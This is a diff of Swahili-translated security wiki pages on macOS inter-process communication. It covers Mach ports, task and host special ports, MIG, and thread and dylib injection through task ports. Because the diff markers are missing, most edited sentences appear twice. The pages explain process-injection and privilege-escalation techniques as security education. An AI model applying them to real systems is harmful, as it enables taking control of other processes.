- **Bit 5 zisizo na umuhimu zaidi za byte ya 3** zinaweza kutumika kwa **local port**
- **Bit 5 zisizo na umuhimu zaidi za byte ya 4** zinaweza kutumika kwa **remote port**
Aina ambazo zinaweza kuainishwa katika voucher, bandari za ndani na za mbali ni (kutoka [**mach/message.h**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)):
```c
@ -108,32 +108,32 @@ Aina ambazo zinaweza kuainishwa katika voucher, bandari za ndani na za mbali ni
#define MACH_MSG_TYPE_DISPOSE_SEND 25 /* must hold send right(s) */
#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26 /* must hold sendonce right */
```
Kwa mfano, `MACH_MSG_TYPE_MAKE_SEND_ONCE` inaweza kutumika ku **onyesha** kwamba **haki ya kutuma mara moja** inapaswa kutolewa na kuhamasishwa kwa bandari hii. Inaweza pia kufafanuliwa `MACH_PORT_NULL` ili kuzuia mpokeaji kuwa na uwezo wa kujibu.
Kwa mfano, `MACH_MSG_TYPE_MAKE_SEND_ONCE` inaweza kutumika ku **onyesha** kwamba **haki ya kutuma mara moja** inapaswa kutolewa na kuhamasishwa kwa ajili ya bandari hii. Inaweza pia kufafanuliwa `MACH_PORT_NULL` ili kuzuia mpokeaji kuwa na uwezo wa kujibu.
Ili kufikia **mawasiliano ya pande mbili** kwa urahisi, mchakato unaweza kufafanua **bandari ya machi** katika **kichwa cha ujumbe** cha machi kinachoitwa _bandari ya kujibu_ (**`msgh_local_port`**) ambapo **mpokeaji** wa ujumbe anaweza **kutuma jibu** kwa ujumbe huu.
Ili kufikia **mawasiliano ya pande mbili** kwa urahisi, mchakato unaweza kufafanua **bandari ya mach** katika **kichwa cha ujumbe** cha mach kinachoitwa _bandari ya kujibu_ (**`msgh_local_port`**) ambapo **mpokeaji** wa ujumbe anaweza **kutuma jibu** kwa ujumbe huu.
> [!TIP]
> Kumbuka kwamba aina hii ya mawasiliano ya pande mbili inatumika katika ujumbe wa XPC ambao unatarajia replay (`xpc_connection_send_message_with_reply` na `xpc_connection_send_message_with_reply_sync`). Lakini **kwa kawaida bandari tofauti zinaundwa** kama ilivyoelezwa hapo awali ili kuunda mawasiliano ya pande mbili.
> Kumbuka kwamba aina hii ya mawasiliano ya pande mbili inatumika katika ujumbe wa XPC ambao unatarajia kujibu (`xpc_connection_send_message_with_reply` na `xpc_connection_send_message_with_reply_sync`). Lakini **kwa kawaida bandari tofauti zinaundwa** kama ilivyoelezwa hapo awali ili kuunda mawasiliano ya pande mbili.
Sehemu nyingine za kichwa cha ujumbe ni:
- `msgh_size`: ukubwa wa pakiti nzima.
- `msgh_remote_port`: bandari ambayo ujumbe huu umetumwa.
- `msgh_remote_port`: bandari ambayo ujumbe huu unatumwa.
- `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html).
- `msgh_id`: ID ya ujumbe huu, ambayo inatafsiriwa na mpokeaji.
> [!CAUTION]
> Kumbuka kwamba **ujumbe wa machi unatumwa kupitia `mach port`**, ambayo ni **mpokeaji mmoja**, **wasambazaji wengi** njia ya mawasiliano iliyojengwa ndani ya kernel ya machi. **Mchakato wengi** wanaweza **kutuma ujumbe** kwa bandari ya machi, lakini kwa wakati wowote **mchakato mmoja tu unaweza kusoma** kutoka kwake.
> Kumbuka kwamba **ujumbe wa mach unatumwa kupitia `mach port`**, ambayo ni **mpokeaji mmoja**, **wasambazaji wengi** njia ya mawasiliano iliyojengwa ndani ya kernel ya mach. **Mchakato mwingi** unaweza **kutuma ujumbe** kwa bandari ya mach, lakini kwa wakati wowote **mchakato mmoja tu unaweza kusoma** kutoka kwake.
Ujumbe kisha unaundwa na kichwa cha **`mach_msg_header_t`** kinachofuatiwa na **mwili** na **trailer** (ikiwa ipo) na inaweza kutoa ruhusa ya kujibu. Katika kesi hizi, kernel inahitaji tu kupitisha ujumbe kutoka kazi moja hadi nyingine.
**Trailer** ni **habari iliyoongezwa kwa ujumbe na kernel** (haiwezi kuwekwa na mtumiaji) ambayo inaweza kutolewa katika kupokea ujumbe kwa kutumia bendera `MACH_RCV_TRAILER_<trailer_opt>` (kuna habari tofauti ambazo zinaweza kutolewa).
**Trailer** ni **habari iliyoongezwa kwenye ujumbe na kernel** (haiwezi kuwekwa na mtumiaji) ambayo inaweza kutolewa katika kupokea ujumbe kwa kutumia bendera `MACH_RCV_TRAILER_<trailer_opt>` (kuna habari tofauti ambazo zinaweza kutolewa).
#### Ujumbe Mchanganyiko
Hata hivyo, kuna ujumbe wengine wenye **mchanganyiko** zaidi, kama zile zinazopitisha haki za bandari za ziada au kushiriki kumbukumbu, ambapo kernel pia inahitaji kutuma vitu hivi kwa mpokeaji. Katika kesi hizi, bit muhimu zaidi ya kichwa `msgh_bits` imewekwa.
Maelezo yanayoweza kupitishwa yanafafanuliwa katika [**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html):
Maelezo yanayoweza kupitishwa yamefafanuliwa katika [**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html):
```c
#define MACH_MSG_PORT_DESCRIPTOR 0
#define MACH_MSG_OOL_DESCRIPTOR 1
@ -170,7 +170,7 @@ Kumbuka kwamba bandari zinahusishwa na nafasi ya kazi, hivyo kuunda au kutafuta
- `mach_port_allocate`: Pata mpya RECEIVE, PORT_SET au DEAD_NAME
- `mach_port_insert_right`: Unda haki mpya katika bandari ambapo una RECEIVE
- `mach_port_...`
- **`mach_msg`** | **`mach_msg_overwrite`**: Kazi zinazotumika **kutuma na kupokea ujumbe za mach**. Toleo la overwrite linaruhusu kubainisha buffer tofauti kwa kupokea ujumbe (toleo lingine litatumia tu).
- **`mach_msg`** | **`mach_msg_overwrite`**: Kazi zinazotumika **kutuma na kupokea ujumbe za mach**. Toleo la overwrite linaruhusu kubaini buffer tofauti kwa ajili ya kupokea ujumbe (toleo lingine litatumia tu).
### Debug mach_msg
@ -267,11 +267,11 @@ name ipc-object rights flags boost reqs recv send sonce oref q
+ send -------- --- 1 <- 0x00002603 (74295) passd
[...]
```
Jina ni jina la chaguo-msingi lililotolewa kwa bandari (angalia jinsi inavyo **ongezeka** katika byte 3 za kwanza). **`ipc-object`** ni **iliyofichwa** kipekee **kitambulisho** cha bandari.\
Pia angalia jinsi bandari zenye haki za **`send`** pekee zinavyoweza **kutambua mmiliki** wake (jina la bandari + pid).\
Jina ni jina la chaguo-msingi lililotolewa kwa bandari (angalia jinsi inavyo **ongezeka** katika byte 3 za kwanza). **`ipc-object`** ni **obfuscated** kipekee **kitambulisho** cha bandari.\
Pia angalia jinsi bandari zenye haki za **`send`** pekee zinavyo **tambua mmiliki** wake (jina la bandari + pid).\
Pia angalia matumizi ya **`+`** kuashiria **kazi nyingine zinazohusiana na bandari hiyo hiyo**.
Pia inawezekana kutumia [**procesxp**](https://www.newosxbook.com/tools/procexp.html) kuona pia **majina ya huduma zilizoregistriwa** (ikiwa SIP imezimwa kutokana na hitaji la `com.apple.system-task-port`):
Pia inawezekana kutumia [**procesxp**](https://www.newosxbook.com/tools/procexp.html) kuona pia **majina ya huduma zilizoorodheshwa** (ikiwa na SIP imezimwa kutokana na hitaji la `com.apple.system-task-port`):
```
procesp 1 ports
```
@ -279,7 +279,7 @@ Unaweza kufunga chombo hiki kwenye iOS kwa kukipakua kutoka [http://newosxbook.c
### Mfano wa msimbo
Angalia jinsi **mjumbe** anavyo **panga** bandari, kuunda **haki ya kutuma** kwa jina `org.darlinghq.example` na kuisafirisha kwa **seva ya bootstrap** wakati mjumbe alipoomba **haki ya kutuma** ya jina hilo na kuitumia kutuma **ujumbe**.
Angalia jinsi **mjumbe** **anavyotenga** bandari, kuunda **haki ya kutuma** kwa jina `org.darlinghq.example` na kuisafirisha kwa **seva ya bootstrap** wakati mjumbe alipoomba **haki ya kutuma** ya jina hilo na kuitumia **kutuma ujumbe**.
{{#tabs}}
{{#tab name="receiver.c"}}
@ -421,18 +421,18 @@ Zile zinazotangulia **kuanzia** nambari **8** zinamilikiwa na **daemons za mfumo
- **Bandari ya Mwenyeji**: Ikiwa mchakato una **idhini ya SEND** juu ya bandari hii anaweza kupata **taarifa** kuhusu **mfumo** kwa kuita taratibu zake kama:
- `host_processor_info`: Pata taarifa za processor
- `host_info`: Pata taarifa za mwenyeji
- `host_virtual_physical_table_info`: Taarifa za meza ya ukurasa wa Virtual/Fizikia (inahitaji MACH_VMDEBUG)
- `host_virtual_physical_table_info`: Taarifa za jedwali la ukurasa wa Virtual/Fizikia (inahitaji MACH_VMDEBUG)
- `host_statistics`: Pata takwimu za mwenyeji
- `mach_memory_info`: Pata mpangilio wa kumbukumbu ya kernel
- **Bandari ya Haki za Mwenyeji**: Mchakato wenye **haki ya SEND** juu ya bandari hii unaweza kufanya **vitendo vya kipaumbele** kama kuonyesha data za kuanzisha au kujaribu kupakia nyongeza ya kernel. **Mchakato unahitaji kuwa root** ili kupata ruhusa hii.
- **Bandari ya Haki za Mwenyeji**: Mchakato wenye **haki ya SEND** juu ya bandari hii anaweza kufanya **vitendo vya kipekee** kama kuonyesha data za kuanzisha au kujaribu kupakia nyongeza ya kernel. **Mchakato unahitaji kuwa root** ili kupata ruhusa hii.
- Zaidi ya hayo, ili kuita API ya **`kext_request`** inahitajika kuwa na haki nyingine **`com.apple.private.kext*`** ambazo zinatolewa tu kwa binaries za Apple.
- Taratibu nyingine zinazoweza kuitwa ni:
- `host_get_boot_info`: Pata `machine_boot_info()`
- `host_priv_statistics`: Pata takwimu za kipaumbele
- `host_priv_statistics`: Pata takwimu za kipekee
- `vm_allocate_cpm`: Pata Kumbukumbu ya Kimwili Inayoendelea
- `host_processors`: Tuma haki kwa processors za mwenyeji
- `mach_vm_wire`: Fanya kumbukumbu kuwa ya makazi
- Kwa kuwa **root** inaweza kufikia ruhusa hii, inaweza kuita `host_set_[special/exception]_port[s]` ili **kuiba bandari maalum za mwenyeji au bandari za kipekee**.
- `mach_vm_wire`: Fanya kumbukumbu kuwa ya kudumu
- Kwa kuwa **root** anaweza kupata ruhusa hii, inaweza kuita `host_set_[special/exception]_port[s]` ili **kuiba bandari maalum za mwenyeji au bandari za kipekee**.
Inawezekana **kuona bandari zote maalum za mwenyeji** kwa kukimbia:
```bash
@ -440,7 +440,7 @@ procexp all ports | grep "HSP"
```
### Task Special Ports
Hizi ni bandari zilizohifadhiwa kwa huduma zinazojulikana. Inawezekana kupata/seti kwa kuita `task_[get/set]_special_port`. Zinapatikana katika `task_special_ports.h`:
Hizi ni bandari zilizohifadhiwa kwa huduma zinazojulikana. Inawezekana kupata/kweka kwa kuita `task_[get/set]_special_port`. Zinapatikana katika `task_special_ports.h`:
```c
typedef int task_special_port_t;
@ -451,8 +451,8 @@ world.*/
#define TASK_WIRED_LEDGER_PORT 5 /* Wired resource ledger for task. */
#define TASK_PAGED_LEDGER_PORT 6 /* Paged resource ledger for task. */
```
- **TASK_KERNEL_PORT**\[task-self send right]: Bandari inayotumika kudhibiti kazi hii. Inatumika kutuma ujumbe unaoathiri kazi. Hii ni bandari inayorejeshwa na **mach_task_self (tazama Task Ports hapa chini)**.
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: Bandari ya bootstrap ya kazi. Inatumika kutuma ujumbe unaohitaji urejeleze bandari nyingine za huduma za mfumo.
- **TASK_KERNEL_PORT**\[task-self send right]: Bandari inayotumika kudhibiti kazi hii. Inatumika kutuma ujumbe unaoathiri kazi hiyo. Hii ni bandari inayorejeshwa na **mach_task_self (tazama Task Ports hapa chini)**.
- **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: Bandari ya bootstrap ya kazi. Inatumika kutuma ujumbe unaohitaji urejeleze wa bandari nyingine za huduma za mfumo.
- **TASK_HOST_NAME_PORT**\[host-self send right]: Bandari inayotumika kuomba taarifa za mwenyeji anayeshikilia. Hii ni bandari inayorejeshwa na **mach_host_self**.
- **TASK_WIRED_LEDGER_PORT**\[ledger send right]: Bandari inayotaja chanzo ambacho kazi hii inapata kumbukumbu yake ya kernel iliyounganishwa.
- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: Bandari inayotaja chanzo ambacho kazi hii inapata kumbukumbu yake ya kawaida inayosimamiwa.
@ -479,15 +479,15 @@ Ili kutekeleza vitendo ndani ya kazi, kazi ilihitaji haki ya `SEND` kwa yenyewe
> [!CAUTION]
> Kumbuka kwamba kwa haki ya SEND juu ya bandari ya kazi ya **kazi tofauti**, inawezekana kutekeleza vitendo kama hivyo juu ya kazi tofauti.
Zaidi ya hayo, bandari ya task_port pia ni bandari ya **`vm_map`** ambayo inaruhusu **kusoma na kudhibiti kumbukumbu** ndani ya kazi kwa kutumia kazi kama `vm_read()` na `vm_write()`. Hii inamaanisha kwamba kazi yenye haki za SEND juu ya task_port ya kazi tofauti itakuwa na uwezo wa **kuingiza msimbo ndani ya kazi hiyo**.
Zaidi ya hayo, task_port pia ni bandari ya **`vm_map`** ambayo inaruhusu **kusoma na kudhibiti kumbukumbu** ndani ya kazi kwa kutumia kazi kama `vm_read()` na `vm_write()`. Hii inamaanisha kwamba kazi yenye haki za SEND juu ya task_port ya kazi tofauti itakuwa na uwezo wa **kuingiza msimbo ndani ya kazi hiyo**.
Kumbuka kwamba kwa sababu **kernel pia ni kazi**, ikiwa mtu atafanikiwa kupata **haki za SEND** juu ya **`kernel_task`**, itakuwa na uwezo wa kufanya kernel itekeleze chochote (jailbreaks).
- Piga `mach_task_self()` ili **kupata jina** la bandari hii kwa kazi ya mwito. Bandari hii inarithiwa tu kupitia **`exec()`**; kazi mpya iliyoundwa kwa `fork()` inapata bandari mpya ya kazi (kama kesi maalum, kazi pia inapata bandari mpya ya kazi baada ya `exec()` katika binary ya suid). Njia pekee ya kuanzisha kazi na kupata bandari yake ni kufanya ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) wakati wa kufanya `fork()`.
- Piga `mach_task_self()` ili **kupata jina** la bandari hii kwa kazi ya mwito. Bandari hii inarithiwa tu kupitia **`exec()`**; kazi mpya iliyoundwa na `fork()` inapata bandari mpya ya kazi (kama kesi maalum, kazi pia inapata bandari mpya ya kazi baada ya `exec()` katika binary ya suid). Njia pekee ya kuanzisha kazi na kupata bandari yake ni kufanya ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) wakati wa kufanya `fork()`.
- Hizi ni vizuizi vya kufikia bandari (kutoka `macos_task_policy` kutoka binary `AppleMobileFileIntegrity`):
- Ikiwa programu ina **`com.apple.security.get-task-allow` entitlement** mchakato kutoka **mtumiaji yule yule wanaweza kufikia bandari ya kazi** (kawaida huongezwa na Xcode kwa ajili ya ufuatiliaji). Mchakato wa **notarization** hautaruhusu katika toleo la uzalishaji.
- Ikiwa programu ina **`com.apple.security.get-task-allow` entitlement** mchakato kutoka **mtumiaji yule yule wanaweza kufikia bandari ya kazi** (kawaida huongezwa na Xcode kwa ajili ya ufuatiliaji). Mchakato wa **notarization** hautaruhusu kwa toleo la uzalishaji.
- Programu zenye **`com.apple.system-task-ports`** entitlement zinaweza kupata **bandari ya kazi kwa mchakato wowote**, isipokuwa kernel. Katika toleo za zamani ilijulikana kama **`task_for_pid-allow`**. Hii inatolewa tu kwa programu za Apple.
- **Root anaweza kufikia bandari za kazi** za programu **zisizokamilishwa** na **runtime iliyohardishwa** (na sio kutoka Apple).
- **Root inaweza kufikia bandari za kazi** za programu **zisizokamilishwa** na **runtime iliyohardishwa** (na sio kutoka Apple).
**Bandari ya jina la kazi:** Toleo lisilo na haki za _bandari ya kazi_. Inarejelea kazi, lakini haiwezeshi kudhibiti. Kitu pekee kinachonekana kupatikana kupitia hiyo ni `task_info()`.
@ -772,13 +772,13 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
### Dylib Injection katika thread kupitia Task port
Katika macOS **threads** zinaweza kudhibitiwa kupitia **Mach** au kutumia **posix `pthread` api**. Thread tuliyoitengeneza katika sindano ya awali, ilitengenezwa kwa kutumia Mach api, hivyo **siyo ya posix compliant**.
Katika macOS **threads** zinaweza kudhibitiwa kupitia **Mach** au kutumia **posix `pthread` api**. Thread tuliyounda katika sindano iliyopita, ilizalishwa kwa kutumia Mach api, hivyo **siyo ya posix**.
Ilikuwa inawezekana **kuiingiza shellcode rahisi** ili kutekeleza amri kwa sababu **haikuhitaji kufanya kazi na posix** compliant apis, bali tu na Mach. **Kuingiza kwa hali ngumu zaidi** kutahitaji **thread** pia iwe **posix compliant**.
Ilikuwa inawezekana **kuiingiza shellcode rahisi** ili kutekeleza amri kwa sababu **haikuhitaji kufanya kazi na apis za posix**, tu na Mach. **Kuingiza kwa hali ngumu zaidi** kutahitaji **thread** pia iwe **ya posix**.
Kwa hivyo, ili **kuboresha thread** inapaswa kuita **`pthread_create_from_mach_thread`** ambayo itaunda **pthread halali**. Kisha, hii pthread mpya inaweza **kuita dlopen** ili **kupakia dylib** kutoka mfumo, hivyo badala ya kuandika shellcode mpya ili kutekeleza vitendo tofauti inawezekana kupakia maktaba maalum.
Unaweza kupata **esempe dylibs** katika (kwa mfano ile inayozalisha log na kisha unaweza kuisikiliza):
Unaweza kupata **esemble dylibs** katika (kwa mfano ile inayozalisha log na kisha unaweza kuisikiliza):
{{#ref}}
../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
@ -1076,7 +1076,7 @@ Wakati wa kuita `task_for_pid` au `thread_create_*` huongeza hesabu katika muund
## Exception Ports
Wakati hitilafu inapotokea katika nyuzi, hitilafu hii inatumwa kwa bandari ya hitilafu iliyoteuliwa ya nyuzi. Ikiwa nyuzi haishughuliki, basi inatumwa kwa bandari za hitilafu za kazi. Ikiwa kazi haishughuliki, basi inatumwa kwa bandari ya mwenyeji ambayo inasimamiwa na launchd (ambapo itakubaliwa). Hii inaitwa triage ya hitilafu.
Wakati hitilafu inapotokea katika nyuzi, hitilafu hii inatumwa kwa bandari ya hitilafu iliyoteuliwa ya nyuzi hiyo. Ikiwa nyuzi hiyo haiishughuliki, basi inatumwa kwa bandari za hitilafu za kazi. Ikiwa kazi hiyo haiishughuliki, basi inatumwa kwa bandari ya mwenyeji ambayo inasimamiwa na launchd (ambapo itakubaliwa). Hii inaitwa triage ya hitilafu.
Kumbuka kwamba mwishoni mara nyingi ikiwa haishughuliki vizuri ripoti itamalizwa na daemon ya ReportCrash. Hata hivyo, inawezekana kwa nyuzi nyingine katika kazi hiyo kusimamia hitilafu, hii ndiyo inayo fanywa na zana za ripoti za ajali kama `PLCreashReporter`.
@ -1091,9 +1091,9 @@ Ili kubadilisha thamani mfumo wa `clock_priv` unaweza kutumika na kazi kama `clo
### Processors and Processor Set
APIs za processor zinaruhusu kudhibiti processor moja ya mantiki kwa kuita kazi kama `processor_start`, `processor_exit`, `processor_info`, `processor_get_assignment`...
APIs za processor zinaruhusu kudhibiti processor moja ya kimantiki kwa kuita kazi kama `processor_start`, `processor_exit`, `processor_info`, `processor_get_assignment`...
Zaidi ya hayo, APIs za **processor set** zinatoa njia ya kuunganisha processors nyingi katika kundi. Inawezekana kupata seti ya processor ya kawaida kwa kuita **`processor_set_default`**.\
Zaidi ya hayo, APIs za **processor set** zinatoa njia ya kuunganisha processors nyingi katika kundi. Inawezekana kupata seti ya kawaida ya processor kwa kuita **`processor_set_default`**.\
Hizi ni baadhi ya APIs za kuvutia kuingiliana na seti ya processor:
- `processor_set_statistics`
@ -1102,8 +1102,8 @@ Hizi ni baadhi ya APIs za kuvutia kuingiliana na seti ya processor:
- `processor_set_stack_usage`
- `processor_set_info`
Kama ilivyotajwa katika [**hii chapisho**](https://reverse.put.as/2014/05/05/about-the-processor_set_tasks-access-to-kernel-memory-vulnerability/), zamani hii iliruhusu kupita ulinzi ulioelezwa hapo awali ili kupata bandari za kazi katika michakato mingine ili kuziendesha kwa kuita **`processor_set_tasks`** na kupata bandari ya mwenyeji kwenye kila mchakato.\
Sasa unahitaji root kutumia kazi hiyo na hii inprotected hivyo utaweza kupata bandari hizi tu kwenye michakato isiyo na ulinzi.
Kama ilivyotajwa katika [**hiki chapisho**](https://reverse.put.as/2014/05/05/about-the-processor_set_tasks-access-to-kernel-memory-vulnerability/), zamani hii iliruhusu kupita ulinzi ulioelezwa hapo awali ili kupata bandari za kazi katika michakato mingine ili kuziendesha kwa kuita **`processor_set_tasks`** na kupata bandari ya mwenyeji kwenye kila mchakato.\
Sasa unahitaji root kutumia kazi hiyo na hii inprotected hivyo utaweza tu kupata bandari hizi kwenye michakato isiyo na ulinzi.
Unaweza kujaribu na:

24
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md
View File

@ -10,11 +10,11 @@ Ufafanuzi umeainishwa katika Lugha ya Ufafanuzi wa Kiolesura (IDL) kwa kutumia k
Mfafanuzi hawa wana sehemu 5:
- **Tangazo la Subsystem**: Neno muhimu la subsystem linatumika kuashiria **jina** na **kitambulisho**. Pia inawezekana kuashiria kama **`KernelServer`** ikiwa server inapaswa kukimbia katika kernel.
- **Tangazo la subsistem**: Neno muhimu subsistem linatumika kuashiria **jina** na **id**. Pia inawezekana kuashiria kama **`KernelServer`** ikiwa server inapaswa kukimbia katika kernel.
- **Injilizi na uagizaji**: MIG inatumia C-preprocessor, hivyo ina uwezo wa kutumia uagizaji. Aidha, inawezekana kutumia `uimport` na `simport` kwa msimbo ulioandikwa na mtumiaji au server.
- **Matangazo ya Aina**: Inawezekana kufafanua aina za data ingawa kwa kawaida itauagiza `mach_types.defs` na `std_types.defs`. Kwa zile za kawaida baadhi ya sintaks inaweza kutumika:
- \[i`n/out]tran`: Kazi inayohitaji kutafsiriwa kutoka ujumbe unaoingia au kwenda nje
- `c[user/server]type`: Mchoro wa aina nyingine ya C.
- **Matangazo ya aina**: Inawezekana kufafanua aina za data ingawa kawaida itauagiza `mach_types.defs` na `std_types.defs`. Kwa aina za kawaida baadhi ya sintaks inaweza kutumika:
- \[i`n/out]tran`: Kazi inayohitaji kutafsiriwa kutoka ujumbe unaoingia au kwenda ujumbe unaotoka
- `c[user/server]type`: Ramani kwa aina nyingine ya C.
- `destructor`: Piga simu kazi hii wakati aina inachukuliwa.
- **Operesheni**: Hizi ni ufafanuzi wa mbinu za RPC. Kuna aina 5 tofauti:
- `routine`: Inatarajia jibu
@ -25,7 +25,7 @@ Mfafanuzi hawa wana sehemu 5:
### Example
Unda faili ya ufafanuzi, katika kesi hii na kazi rahisi sana:
Create a definition file, in this case with a very simple function:
```cpp:myipc.defs
subsystem myipc 500; // Arbitrary name and id
@ -104,7 +104,7 @@ return 0;
return SERVERPREFmyipc_subsystem.routine[msgh_id].stub_routine;
}
```
Katika mfano huu tumefafanua tu kazi 1 katika maelezo, lakini kama tungeweza kufafanua kazi zaidi, zingekuwa ndani ya array ya **`SERVERPREFmyipc_subsystem`** na ya kwanza ingekuwa imepewa ID **500**, ya pili ingekuwa na ID **501**...
Katika mfano huu tumefafanua tu kazi 1 katika ufafanuzi, lakini kama tungeweza kufafanua kazi zaidi, zingekuwa ndani ya array ya **`SERVERPREFmyipc_subsystem`** na ya kwanza ingekuwa imepewa ID **500**, ya pili ingekuwa na ID **501**...
Ikiwa kazi ilitarajiwa kutuma **reply** kazi `mig_internal kern_return_t __MIG_check__Reply__<name>` pia ingekuwepo.
@ -149,7 +149,7 @@ return FALSE;
}
</code></pre>
Angalia mistari iliyosisitizwa hapo awali inayofikia kazi ya kuita kwa ID.
Angalia mistari iliyosisitizwa hapo awali inayoingia kwenye kazi ya kuita kwa ID.
Ifuatayo ni msimbo wa kuunda **seva** na **mteja** ambapo mteja anaweza kuita kazi ya Kupunguza kutoka kwa seva:
@ -235,13 +235,13 @@ Kama binaries nyingi sasa zinatumia MIG kufichua mach ports, ni ya kuvutia kujua
```bash
jtool2 -d __DATA.__const myipc_server | grep MIG
```
Zaidi ya hayo, kazi za MIG ni vifungashio vya kazi halisi inayoitwa, ambayo inamaanisha kwamba kupata usambazaji wake na kutafuta BL unaweza kukusaidia kupata kazi halisi inayoitwa:
Zaidi ya hayo, kazi za MIG ni vifungashio vya kazi halisi inayoitwa, ambayo inamaanisha kwamba kupata usambazaji wake na kutafuta BL unaweza kukuwezesha kupata kazi halisi inayoitwa:
```bash
jtool2 -d __DATA.__const myipc_server | grep BL
```
### Assembly
Ilielezwa awali kwamba kazi ambayo itashughulikia **kuita kazi sahihi kulingana na kitambulisho cha ujumbe kilichopokelewa** ilikuwa `myipc_server`. Hata hivyo, kwa kawaida hutakuwa na alama za binary (hakuna majina ya kazi), hivyo ni ya kuvutia **kuangalia jinsi inavyoonekana baada ya kutafsiriwa** kwani itakuwa karibu sawa kila wakati (kanuni ya kazi hii ni huru kutoka kwa kazi zilizowekwa):
Ilielezwa awali kwamba kazi ambayo itashughulikia **kuita kazi sahihi kulingana na kitambulisho cha ujumbe kilichopokelewa** ilikuwa `myipc_server`. Hata hivyo, kwa kawaida hutakuwa na alama za binary (hakuna majina ya kazi), hivyo ni ya kuvutia **kuangalia jinsi inavyoonekana baada ya kutafsiriwa** kwani itakuwa karibu sana (kanuni ya kazi hii ni huru kutoka kwa kazi zilizowekwa):
{{#tabs}}
{{#tab name="myipc_server decompiled 1"}}
@ -259,7 +259,7 @@ var_18 = arg1;
if (*(int32_t *)(var_10 + 0x14) &#x3C;= 0x1f4 &#x26;&#x26; *(int32_t *)(var_10 + 0x14) >= 0x1f4) {
rax = *(int32_t *)(var_10 + 0x14);
// Kuitisha sign_extend_64 ambayo inaweza kusaidia kutambua kazi hii
// Hii inahifadhi katika rax kiashiria cha wito ambacho kinahitaji kuitwa
// Hii inahifadhi katika rax kiashiria cha simu ambacho kinahitaji kuitwa
// Angalia matumizi ya anwani 0x100004040 (array ya anwani za kazi)
// 0x1f4 = 500 (kitambulisho cha kuanzia)
<strong> rax = *(sign_extend_64(rax - 0x1f4) * 0x28 + 0x100004040);
@ -271,7 +271,7 @@ rax = *(int32_t *)(var_10 + 0x14);
var_4 = 0x0;
}
else {
// Anwani iliyokadiriwa inayoiita kazi sahihi na hoja 2
// Anwani iliyohesabiwa inayoiita kazi sahihi na hoja 2
<strong> (var_20)(var_10, var_18);
</strong> var_4 = 0x1;
}
@ -340,7 +340,7 @@ r8 = 0x1;
var_4 = 0x0;
}
else {
// Wito kwa anwani iliyokadiriwa ambapo kazi inapaswa kuwa
// Kuitisha anwani iliyohesabiwa ambapo kazi inapaswa kuwa
<strong> (var_20)(var_10, var_18);
</strong> var_4 = 0x1;
}

14
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md
View File

@ -25,9 +25,9 @@ Kwa mawasiliano ya pande mbili, haki mbili za kupokea Mach zinaundwa: moja katik
Kuzingatia bandari ya ndani, haki ya kupokea inashikiliwa na kazi ya ndani. Bandari inaundwa kwa `mach_port_allocate()`. Changamoto iko katika kuhamasisha haki ya kutuma kwa bandari hii kwenye kazi ya mbali.
Stratejia moja inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani kwenye `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaelekezwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Stratejia moja inahusisha kutumia `thread_set_special_port()` kuweka haki ya kutuma kwa bandari ya ndani katika `THREAD_KERNEL_PORT` ya nyuzi ya mbali. Kisha, nyuzi ya mbali inaelekezwa kuita `mach_thread_self()` ili kupata haki ya kutuma.
Kwa bandari ya mbali, mchakato kimsingi unarudiwa. Nyuzi ya mbali inaelekezwa kuunda bandari ya Mach kupitia `mach_reply_port()` (kama `mach_port_allocate()` haiwezi kutumika kutokana na mfumo wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa kwenye nyuzi ya mbali ili kuanzisha haki ya kutuma. Haki hii kisha inahifadhiwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali ili kupata haki ya kutuma kwa bandari mpya iliyotolewa katika kazi ya mbali.
Kwa bandari ya mbali, mchakato kimsingi unabadilishwa. Nyuzi ya mbali inaelekezwa kuunda bandari ya Mach kupitia `mach_reply_port()` (kama `mach_port_allocate()` haiwezi kutumika kutokana na mfumo wake wa kurudi). Baada ya kuundwa kwa bandari, `mach_port_insert_right()` inaitwa katika nyuzi ya mbali ili kuanzisha haki ya kutuma. Haki hii kisha inahifadhiwa kwenye kernel kwa kutumia `thread_set_special_port()`. Kurudi kwenye kazi ya ndani, `thread_get_special_port()` inatumika kwenye nyuzi ya mbali ili kupata haki ya kutuma kwa bandari mpya iliyotolewa katika kazi ya mbali.
Kukamilika kwa hatua hizi kunasababisha kuanzishwa kwa Mach ports, kuweka msingi wa mawasiliano ya pande mbili.
@ -63,7 +63,7 @@ ret
Kuchunguza maktaba za kawaida kumefichua wagombea wanaofaa kwa ajili ya operesheni hizi:
1. **Kusoma Kumbukumbu:**
Funguo `property_getName()` kutoka kwa [maktaba ya wakati wa kukimbia ya Objective-C](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) inatambuliwa kama kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imeelezwa hapa chini:
Funguo `property_getName()` kutoka kwa [maktaba ya wakati wa Objective-C](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) inatambuliwa kama kazi inayofaa kwa kusoma kumbukumbu. Kazi hiyo imeelezwa hapa chini:
```c
const char *property_getName(objc_property_t prop) {
return prop->name;
